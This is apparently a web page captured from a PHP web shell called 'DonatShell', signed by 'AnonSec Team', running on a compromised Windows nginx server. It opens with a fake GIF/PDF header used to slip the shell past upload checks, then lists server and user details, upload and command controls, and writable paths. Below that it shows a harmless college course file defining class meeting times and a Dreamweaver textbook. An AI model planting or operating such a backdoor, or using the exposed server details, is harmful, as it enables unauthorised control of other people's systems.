GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/MMDT1144/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive/MMDT1144/classInfo.phpinc
<?
// MMDT1146/classInfo.phpinc

debugTrackBegin();
if (dc()) { echo basename(__FILE__)," line ",__LINE__,": ","<b>".__FILE__."</b><br>\n"; }
// Class information.
$class = array();
$class['credits'] = 3;
$class['lectureHours'] = 3;
$class['labHours'] = 0;
$class['startDate'][] = '2017-01-10';
$class['startDate'][] = '2017-01-12';
#$class['EndDate'][] = '2016-05-14';
$class['meetingTime'][] = "1:30pm-2:45pm";
$class['meetingTime'][] = "1:30pm-2:45pm";
$class['Lab'] = array();
//$class[''] = "";

// Textbook information.
$textbook = array();
$textbook['Title1'] = "Dreamweaver CC Visual Quickstart Guide";
$textbook['Edition1'] = "14th";
$textbook['Author1'] = "Tom Megrino, Dori Smith";
$textbook['Publisher1'] = "Peachpit Press";
$textbook['Copyright1'] = "2012";
$textbook['ISBN1_10'] = "0-321-92951-9";
$textbook['ISBN1_13'] = "978-0-321-92951-8";

$textbookCoverSRC = '/'.str_replace($_SESSION['DIRECTORY_ROOT'],"",str_replace("\\","/",dirname(__FILE__))).'/'.$textbook['ISBN1_10'];
#echo $textbookCoverSRC."<br>\n";
#echo '<pre>'; print_r($_SESSION); echo '</pre>';

if (file_exists(str_replace("\\","/",dirname(__FILE__)).'/'.$textbook['ISBN1_10'].'-small.jpg')) {
	if (file_exists(str_replace("\\","/",dirname(__FILE__)).'/'.$textbook['ISBN1_10'].'.jpg')) {
		$textbook['Cover1'] = '<a href="'.$textbookCoverSRC.'.jpg">'.'<img src="'.$textbookCoverSRC.'-small.jpg" alt="'.$textbook['Title1'].' cover" /></a>';
	} else {
		$textbook['Cover1'] = '<img src="'.$textbookCoverSRC.'-small.jpg" alt="'.$textbook['Title1'].' cover" />';
	}
} else {
	$textbook['Cover1'] = '';
}

$textbook['Title1'] = '<i>'.$textbook['Title1'].'</i>';
if ($textbook['Edition1'] != '') { $textbook['Edition1Edition'] = " <i>".$textbook['Edition1']." Edition</i>"; } else { $textbook['Edition1Edition'] = ''; }
$textbook['Copyright1'] = '&copy;'.$textbook['Copyright1'];
if ($textbook['ISBN1_13'] == '') {
	$textbook['ISBN1'] = 'ISBN: '.$textbook['ISBN1_10'];
} else {
	$textbook['ISBN1'] = 'ISBN-10: '.$textbook['ISBN1_10'].'<br>'.'ISBN-13: '.$textbook['ISBN1_13'];
}
$textbook['textbook1'] = '<table><tr><td>'.$textbook['Cover1'].'</td><td>';
$textbook['textbook1'] .= $textbook['Title1']."<br>";
if ($textbook['Edition1'] !='') $textbook['textbook1'] .= "Edition: ".$textbook['Edition1']."<br>";
$textbook['textbook1'] .= $textbook['Author1']."<br>";
$textbook['textbook1'] .= $textbook['Publisher1']." ".$textbook['Copyright1']."<br>";
$textbook['textbook1'] .= $textbook['ISBN1'];
$textbook['textbook1'] .= '</td><td>&nbsp; (Student supplied textbook).</td></tr></table>';

include('Course/classHours.phpinc');
debugTrackEnd();
?>

Anon7 - 2022
AnonSec Team